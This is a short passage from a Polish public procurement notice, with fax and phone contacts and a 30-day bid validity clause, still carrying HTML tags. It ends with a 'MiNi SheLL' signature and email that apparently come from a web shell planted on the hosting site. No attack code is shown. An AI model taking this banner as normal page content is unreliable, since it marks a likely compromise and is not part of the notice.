Wydział Zamówień Publicznych i Funduszy Pomocowych
tel. 071) 340 3973; faks (071) 782 4171.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com